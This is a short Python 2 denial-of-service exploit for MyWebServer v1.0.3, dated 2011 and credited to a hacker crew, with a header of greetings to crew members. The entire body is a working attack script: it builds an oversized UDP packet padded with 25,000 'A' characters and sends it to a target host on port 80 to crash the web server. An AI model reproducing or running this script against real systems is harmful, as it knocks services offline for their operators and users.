# #########################################################################
#~ Title : MyWebServer v1.0.3 Denial Of Service
#~ Software: http://www.softpedia.com/get/Internet/Servers/WEB-Servers/MyWebServer.shtml
#~ Tested on : Windows 7 (home premium) / Windows XP SP2 EN
#~ Date: 27/07/2011
#~ Author: X-h4ck
#~ Site: http://www.pirate.al/ #PirateAL Crew , http://theflashcrew.blogspot.com/
#~ Email : mem001@live.com
#~ Greetz: Danzel - Wulns~ - IllyrianWarrior- Ace - M4yh3m - Saldeath - bi0 - Slimshaddy - d3trimentaL - Lekosta - Pretorian - CroSs - Rigon - mywisdom
# #########################################################################
#Attention : It will crash on google chrome!
print " MyWebServer v1.0.3 Denial Of Service"
print " PirateAL@ // Aint no pussy made where we came from \\ "
print " "
import socket
host = '' #IP
port = 80 #PORT
buff = "\x41" * 25000
aww = "A"
exp = "\x00\x01" + buff + "\0" + aww + "\0"
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
print "Connecting..."
print "w8..."
sock.sendto(exp, (host, port))
print sock.recv(1024)
print "hmmm, done"